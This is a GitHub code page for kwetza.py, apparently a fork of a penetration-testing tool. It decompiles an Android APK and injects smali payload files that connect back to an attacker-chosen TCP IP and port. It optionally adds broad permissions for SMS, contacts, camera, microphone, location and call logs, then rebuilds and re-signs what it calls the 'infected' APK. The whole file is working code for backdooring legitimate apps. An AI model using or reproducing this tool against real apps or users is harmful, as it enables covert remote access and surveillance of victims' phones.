forked from sensepost/kwetza
-
Notifications
You must be signed in to change notification settings - Fork 0
/
kwetza.py
253 lines (230 loc) · 8.91 KB
/
kwetza.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
#!/usr/bin/pyton
import subprocess
import sys
import os
from bs4 import BeautifulSoup as Soup
activityToTarget=""
targetFolder=""
endpointIP=""
endpintPort=""
hexEndpoint=""
facepalm=""
cwd=""
def byteTheComms():
print "[*] BYTING COMMS..."
totalEndpointPlain="ZZZZtcp://"+endpointIP+":"+endpintPort
endpointLength=len(totalEndpointPlain)
global facepalm
facepalm=hex(endpointLength)
global hexEndpoint
for val in totalEndpointPlain:
hexEndpoint+=hex(ord(val))+"\n\t\t"
def initialize():
print "[*] DECOMPILING TARGET APK"
command = ["apktool", "--version"]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
theResult = p.communicate()[0]
global endpintPort
global endpointIP
endpointIP=sys.argv[2]
endpintPort=sys.argv[3]
global cwd
print "[+] ENDPOINT IP: "+endpointIP
print "[+] ENDPOINT PORT: "+endpintPort
#CHECK IF APKTOOL IS INSTALLED
if "2." not in theResult:
print "[+] NO APKTOOL VERSION 2, PLEASE INSTALL APKTOOL 2 AND ADD TO PATH"
sys.exit()
cwd = os.getcwd()
#NOW WE NEED TO DECOMPILE THE APPLICATION
command = ["apktool", "d", ""+cwd+"/"+sys.argv[1]]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()[0]
if "error" in result:
print "[+] APKTOOL DECOMPILE ERROR: ",result
else:
print "[+] APKTOOL DECOMPILED SUCCESS"
#NOW WE SET THE TARGET FOLDER
outputFolderName=sys.argv[1]
intPoss=outputFolderName.index(".")
global targetFolder
targetFolder=cwd+"/"+outputFolderName[:intPoss]
def parseAndroidManifext():
print "[*] ANALYZING ANDROID MANIFEST"
global targetFolder
file = targetFolder+"/AndroidManifest.xml"
handler = open(file).read()
soup = Soup(handler,"lxml")
activities= soup.find_all('activity-alias')
activities+=soup.find_all('activity')
foundLAUNCHER=0
for activity in activities:
if "LAUNCHER" in str(activity):
foundLAUNCHER=1
global activityToTarget
if "android:targetactivity" in str(activity).lower():
activityToTarget= str(activity['android:targetactivity'])
elif "android:name" in str(activity).lower():
activityToTarget= str(activity['android:name'])
else:
print "[+] ERROR IDENTIFYING ACTIVITY"
if foundLAUNCHER==1:
print "[+] TARGET ACTIVIY: "+activityToTarget
else:
print "[+] NO LAUNCHER FOUND!!!!!"
def readPayloads():
global cwd
pathToPalyoad1=cwd+"/"+"payload/AssistActivity1.smali"
pathToPalyoad12=cwd+"/"+"payload/AssistActivity.smali"
contentsOfFile1 = open(pathToPalyoad1).read()
contentsOfFile2 = open(pathToPalyoad12).read()
inject="L"+activityToTarget.replace('.','/')
intPackagePos=inject.rfind('/')
preppedContents1= contentsOfFile1.replace('PLACEHOLDER',inject[:intPackagePos])
preppedContents2= contentsOfFile2.replace('PLACEHOLDER',inject[:intPackagePos])
#inject the tcp endpoint here
preppedContents2= preppedContents2.replace('FACEPALM',facepalm)
preppedContents2= preppedContents2.replace('BEARDEDGREATNESS',hexEndpoint)
targetDirectory=targetFolder+"/smali/"+activityToTarget.replace('.','/')
targetDirectory=targetDirectory[:targetDirectory.rfind('/')]
assist1File = open(targetDirectory+"/AssistActivity1.smali", "w")
assist1File.write(preppedContents1)
assist1File.close()
assist2File = open(targetDirectory+"/AssistActivity.smali", "w")
assist2File.write(preppedContents2)
assist2File.close()
pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
stringContentsOfTargetActivity=""
stringContentsOfTargetActivity = open(pathToFile).read()
def injectIntoActivity():
print "[*] INJECTING INTO APK..."
global targetFolder
checkStrings=['create','method']
pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
#NOW WE NEED TO INJECT THE CALLING CODE INTO THE TARGET ACTIVITY
stringInvokePayload='\ninvoke-static {p0}, INJECT/AssistActivity;->doThis(Landroid/content/Context;)V\n'
inject="L"+activityToTarget.replace('.','/')
intPackagePos=inject.rfind('/')
stringPackageToInject=inject[:intPackagePos]
stringInvokePayload=stringInvokePayload.replace('INJECT',stringPackageToInject);
f = open(pathToFile,'r')
stringDataToWriteIntoNewActivity=""
for line in f.readlines():
stringDataToWriteIntoNewActivity+=line
if all(x in line.lower() for x in checkStrings):
stringDataToWriteIntoNewActivity+=stringInvokePayload
f.close()
pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
newInjectFile = open(pathToFile, "w")
newInjectFile.write(stringDataToWriteIntoNewActivity)
newInjectFile.close()
def buildAgain():
print "[+] TIME TO BUILD INFECTED APK..."
#name of the APK we are targeting
stringNameOfAPK=sys.argv[1]
#the path to our freshly built apk
pathToNewApk=targetFolder+"/dist/"+stringNameOfAPK
#the apktool command to rebuild our target app
stringApkToolBuildCommand= ["apktool","b",targetFolder]
#jarsigner command to sign our freshly built apk
stringJarSignerCommand=["jarsigner", "-keystore", cwd+"/"+"payload/mykey.keystore", pathToNewApk, "alias_name", "-sigalg", "MD5withRSA", "-digestalg", "SHA1"]
#time to execute the build command
print "[*] EXECUTING APKTOOL BUILD COMMAND..."
p = subprocess.Popen(stringApkToolBuildCommand, stdout=subprocess.PIPE)
buildResult = p.communicate()[0]
print "[+] BUILD RESULT"
print "#####################################"
print buildResult
print "#####################################"
#time to execute the jarsigner command
print "[*] EXECUTING JARSIGNER COMMAND..."
p = subprocess.Popen(stringJarSignerCommand, stdout=subprocess.PIPE)
jarsignerResult = p.communicate()[0]
print "[+] JARSIGNER RESULT"
print "#####################################"
print jarsignerResult
print "#####################################"
print "\n[+] L00t located at "+targetFolder+"/dist/"+sys.argv[1]
def injectCrazyPermissions():
print "[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED"
if "yes" in sys.argv[4]:
print "[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!"
stringCrazyPermissions='\n<uses-permission android:name="android.permission.INTERNET" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_PHONE_STATE" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.SEND_SMS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECEIVE_SMS"/>'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECORD_AUDIO" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.CALL_PHONE" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_CONTACTS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.WRITE_CONTACTS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECORD_AUDIO" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.WRITE_SETTINGS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.CAMERA" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_SMS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_CALL_LOG" />"\n'
global targetFolder
checkString="<uses-permission android:name="
pathToFile=targetFolder+"/AndroidManifest.xml"
#NOW WE NEED TO INJECT THE ADDITIONAL PERMISSIONS INTO THE TARGET MANIFEST
firstCheck=0;
f = open(pathToFile,'r')
stringDataToWriteIntoNewActivity=""
for line in f.readlines():
stringDataToWriteIntoNewActivity+=line
if checkString.lower() in line.lower():
if firstCheck==0:
stringDataToWriteIntoNewActivity+=stringCrazyPermissions
firstCheck=1
f.close()
newInjectFile = open(pathToFile, "w")
newInjectFile.write(stringDataToWriteIntoNewActivity)
newInjectFile.close()
else:
print "[*] ABUSING LEGITIMATE PERMISSIONS"
if __name__ == "__main__":
print "[+] MMMMMMMM KWETZA";
try:
initialize()
except Exception as e:
print "!!!! ERROR IN 'initialize' method"
print str(e)
sys.exit()
try:
byteTheComms()
except Exception as e:
print "!!! ERROR IN 'byteTheComms' method"
print str(e)
sys.exit()
try:
parseAndroidManifext()
except Exception as e:
print "!!! ERROR IN 'parseAndroidManifext' method"
print str(e)
sys.exit()
try:
readPayloads()
except Exception as e:
print "!!! ERROR IN 'readPayloads' method"
print str(e)
sys.exit()
try:
injectIntoActivity()
except Exception as e:
print "!!! ERROR IN 'injectIntoActivity' method"
print str(e)
sys.exit()
try:
injectCrazyPermissions()
except Exception as e:
print "!!! ERROR IN 'injectCrazyPermissions' method"
print str(e)
sys.exit()
try:
buildAgain()
except Exception as e:
print "!!! ERROR IN 'buildAgain' method"
print str(e)
sys.exit()